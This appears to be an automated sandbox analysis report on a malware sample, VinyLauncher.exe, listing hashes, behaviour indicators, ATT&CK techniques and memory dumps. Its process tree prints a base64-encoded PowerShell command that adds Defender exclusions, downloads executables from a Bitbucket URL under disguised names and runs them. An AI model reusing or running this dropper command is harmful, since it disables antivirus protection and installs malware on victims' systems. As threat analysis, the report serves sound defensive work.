b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
78s
max time network
69s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
26-12-2022 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VinyLauncher.exe
Size

160KB
MD5

6260d545ece6e4f04cafc98adf93ff7b
SHA1

5f4f3a9edee92982ba2ff096827fc4da8ecc649a
SHA256

8ddb7cbefe9e072050de7fca61b3db887abfdae8bc4f06ffca6446fac3c8c10f
SHA512

c80d7b4bf465a43b1a6a1168105ad96b866943339ef109283b5105dd44681ed5799e37996ee87bbceccf0f9bf3a9627c97aa660318c1a7e493be61b5e29c722a
SSDEEP

3072:vPw/kZu7QBUiLkFcEdKS2fpp/9eLjEHj9t39cDLztUbkxl:AENBUiLkFcEcS2fppVeLjEHvNcDLzSb

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

4 1452 powershell.exe
5 1452 powershell.exe
5 1452 powershell.exe
7 1452 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1452 powershell.exe
1452 powershell.exe
1452 powershell.exe
1700 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

VinyLauncher.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1340 VinyLauncher.exe
Token: SeDebugPrivilege 1452 powershell.exe
Token: SeDebugPrivilege 1700 powershell.exe

flow	pid	process
4	1452	powershell.exe
5	1452	powershell.exe
5	1452	powershell.exe
7	1452	powershell.exe

pid	process
1452	powershell.exe
1452	powershell.exe
1452	powershell.exe
1700	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1340	VinyLauncher.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

VinyLauncher.exepowershell.exe

description	pid	process	target process
PID 1340 wrote to memory of 1452	1340	VinyLauncher.exe	powershell.exe
PID 1340 wrote to memory of 1452	1340	VinyLauncher.exe	powershell.exe
PID 1340 wrote to memory of 1452	1340	VinyLauncher.exe	powershell.exe
PID 1452 wrote to memory of 1700	1452	powershell.exe	powershell.exe
PID 1452 wrote to memory of 1700	1452	powershell.exe	powershell.exe
PID 1452 wrote to memory of 1700	1452	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZwBpACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHoAcABwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcgBjACMAPgA7ACIAOwA8ACMAdwBuAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAG0AYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AGMAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGgAYgAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwByAG8AdQB0AGUALgBlAHgAZQAnACwAIAA8ACMAcwBoAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGMAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAGkAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAGgAZQBjAGsAcwB1AG0ALgBlAHgAZQAnACkAKQA8ACMAawBwAHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwBsAGkAbQBtAC4AZQB4AGUAJwAsACAAPAAjAGUAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBuAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABoAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQApADwAIwB1AHcAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHEAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBtAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBoAGUAYwBrAHMAdQBtAC4AZQB4AGUAJwApADwAIwBqAHEAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAHAAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcwBpAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQA8ACMAbABtAHQAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#zpp#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#drc#>;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b0253c34f3d5eaf604a3fe495c8913b6

SHA1
e9de3ae9a0c3ff0b73c5670846e2cbb58fb3a664

SHA256
541dec10f1860c4dd1fd6e3e5e4a83c85df4836abf4814db5dda70e181482e9f

SHA512
741e76ee6b28c357a54cee7cca668202fc90ef302230bd54044f0d592ae40b7e8de0974add68ae5cf6d7e772cf65ab3282ccab17003686e4a47b0e028b0cb088

Download Submit
memory/1340-54-0x0000000000090000-0x00000000000BE000-memory.dmp

Filesize
184KB

Download
memory/1340-55-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp

Filesize
8KB

Download
memory/1452-59-0x000007FEF2AC0000-0x000007FEF361D000-memory.dmp

Filesize
11.4MB

Download
memory/1452-58-0x000007FEF4130000-0x000007FEF4B53000-memory.dmp

Filesize
10.1MB

Download
memory/1452-60-0x0000000001E70000-0x0000000001EF0000-memory.dmp

Filesize
512KB

Download
memory/1452-73-0x0000000001E70000-0x0000000001EF0000-memory.dmp

Filesize
512KB

Download
memory/1452-61-0x0000000001E70000-0x0000000001EF0000-memory.dmp

Filesize
512KB

Download
memory/1452-56-0x0000000000000000-mapping.dmp

Download
memory/1700-66-0x000007FEF2AC0000-0x000007FEF361D000-memory.dmp

Filesize
11.4MB

Download
memory/1700-65-0x000007FEF4130000-0x000007FEF4B53000-memory.dmp

Filesize
10.1MB

Download
memory/1700-67-0x000000001B8A0000-0x000000001BB9F000-memory.dmp

Filesize
3.0MB

Download
memory/1700-69-0x0000000002A74000-0x0000000002A77000-memory.dmp

Filesize
12KB

Download
memory/1700-70-0x0000000002A7B000-0x0000000002A9A000-memory.dmp

Filesize
124KB

Download
memory/1700-68-0x000007FEED800000-0x000007FEEE896000-memory.dmp

Filesize
16.6MB

Download
memory/1700-71-0x0000000002A74000-0x0000000002A77000-memory.dmp

Filesize
12KB

Download
memory/1700-72-0x0000000002A7B000-0x0000000002A9A000-memory.dmp

Filesize
124KB

Download
memory/1700-62-0x0000000000000000-mapping.dmp

Download